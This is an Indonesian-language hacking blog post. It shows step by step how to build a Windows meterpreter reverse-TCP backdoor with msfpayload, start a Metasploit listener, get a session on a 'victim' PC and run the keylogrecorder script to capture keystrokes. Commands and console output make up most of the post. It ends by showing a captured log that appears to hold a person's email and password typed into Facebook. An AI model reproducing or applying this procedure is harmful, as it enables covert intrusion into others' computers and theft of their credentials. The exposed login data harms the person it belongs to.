mengaktifkan Keylogger dengan meterpreter

Udah lama gk nulis mengenai meterpreter di blog ini… hmm memang sangar sih ahhahaha..ya udah langsung ja. Artikel metasploit kali ini adalah tentang bagaimana kita mengaktifkan keylogger setelah kita mendapatkan akses meterpreter di pc korban.
+=======================+
+ vurln on
+=======================+
+
+windows xp1, xp2, xp3
+windows vista
+windows 7
+windows 8
+
+=======================+
hmmm ya udah kita coba praktekan yah… pertama2 sih ane menjalankan perintah-perintah metasploit payload standart

zee@eichel:~# ifconfig
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet addr:192.168.1.3 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:62775 errors:0 dropped:0 overruns:0 frame:0
TX packets:73688 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:21990075 (21.9 MB) TX bytes:8620397 (8.6 MB)
Interrupt:43 Base address:0×4000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:204 errors:0 dropped:0 overruns:0 frame:0
TX packets:204 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13520 (13.5 KB) TX bytes:13520 (13.5 KB)
Perintah di atas tadi adalah agar kita bisa tau ip address yang hendak kita pasang di msfcli (listener) dan msfpayload (backdoor)

+———————+
+creating backdoor +
+———————+
zee@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.3 x > /var/www/bd.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“LHOST”=>”192.168.1.3″}
Perintah di atas adalah perintah untuk membuat backdoor berbasis windows dan membuka meterpreter dengan LHOST yang diisikan IP kita , kemudian akan tersimpan di directory /var/www .

+——————-+
+listener mode on +
+——————-+
zee@eichel:~# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.3 LPORT=4444 E
[*] Please wait while we load the module tree…

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13733 updated 96 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 96 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.1.3
LPORT => 4444
[*] Started reverse handler on 192.168.1.3:4444
[*] Starting the payload handler…
ok tahap listener sudah selesai… kita tinggal menunggu signal dari backdoor yang telah kita buat tadi dan ane anggap sudah di dalam komputer target dan diesekusi oleh si target.

dan setelah di esekusi target …
PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.1.3
LPORT => 4444
[*] Started reverse handler on 192.168.1.3:4444
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.14:1054) at 2011-11-05 02:56:07 +0700
meterpreter >
yup meterpreter sudah terbuka pada [192.168.3] port 4444 dan di akses oleh komputer target [192.168.14] pada port 1054

+————————–+
+gathering information+
+————————–+
selanjutnya kita cek informasinya …
meterpreter > sysinfo
System Language : en_xx
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : server_name
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
hmmmm selanjutnya kita tinggal menjalankan inti pembicaraan kita ok menjalankan service keylogger di sana … ok deh
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1508
[*] Migration Successful!!
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt
[*] Recording
^C[*] Saving last few keystrokes

dengan melihat hasil command di atas dapat kita lihat bahwa meterpreter secara otomatis mencari proses explorer.exe yang berjalan di komputer target dan secara otomatis melakukan migrating ke pid tersebut (1508). Secara manual biasanya kita melakukan perintah ps untuk melihat proses kemudian dilanjutkan dengan migrating [pid] [proses id]. Hasil dari rekaman keylogger dari setiap keystroke korban disimpan di /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt
ironis memang klo disaat kita memulai keylogger tersebut jika misalkan si korban meninggalkan komputer gara-gara kebelet, atau di telp pacar sehingga dia tidak mengetik apa-apa sehingga tidak ada log yang tercipta untuk “last keystroke” yang telah di record pada dir di atas.
Untuk itu kita jalankan proses recording di background saja
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1508
[*] Migration Successful!!
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5810.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer…
meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 0
meterpreter > [*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5950.txt
[*] Recording

saya membatalkan proses recording pertama kemudian melanjutkanya dengan proses bgrun. kita cek iddle time dari korban
meterpreter > idletime
User has been idle for: 2 mins 20 secs
ternyata sudah 2 menitan korban iddle atau tidak melakukan kegiatan keyboard maupun mouse.
+———-+
+hasil log+
+———-+
Ane melakukan testing terhadap keylogger stroke yang telah merekam dan secara otomatis di simpan pada directory /root/.msf4/logs/scripts/keylogrecorder/
zee@eichel:~# less /root/.msf4/logs/scripts/keylogrecorder/192.168.1.14_20111105.5950.txt

atau kita bisa melihat dengan menggunakan cara
zee@eichel:~/.msf4/logs/scripts/keylogrecorder# grep -v ^$ 192.168.1.14_20111105.5950.txt|more
facebook.com
ro mayalestarti@yahoo.com benisayangamu

nah melihat log seperti ini sih sebenarnya tinggal dari logika saja… karena berbeda dengan sniffing yang merekam semua user name dan password…keystroke keylogger mencuri semua hasil keystroke atau hasil penekanan terhadap keyboard sehingga apa saja yang di ketik oleh korban akan terekam… dan tentu saja agak sulit untuk kita melihat mana yang password mana yang bukan… tapi di lihat dari log di atas agaknya korban membuka browser kemudian mengetik facebook.com untuk memanggil site tersebut pada url bar, lalu memasukan email dan password pada tab login.
ok tidak sulitkan? .. ya udah saya ijin undur , terima kasih telah mengunjungi blog saya.,.. jgn lupa untuk bergabung bersama komunitas pengguna backtrack terbesar di indonesia dengan membuka url indonesianbacktrack.or.id

==========
Sumber : Zee Eichul
==========
Previous
Next Post »
Thanks for your comment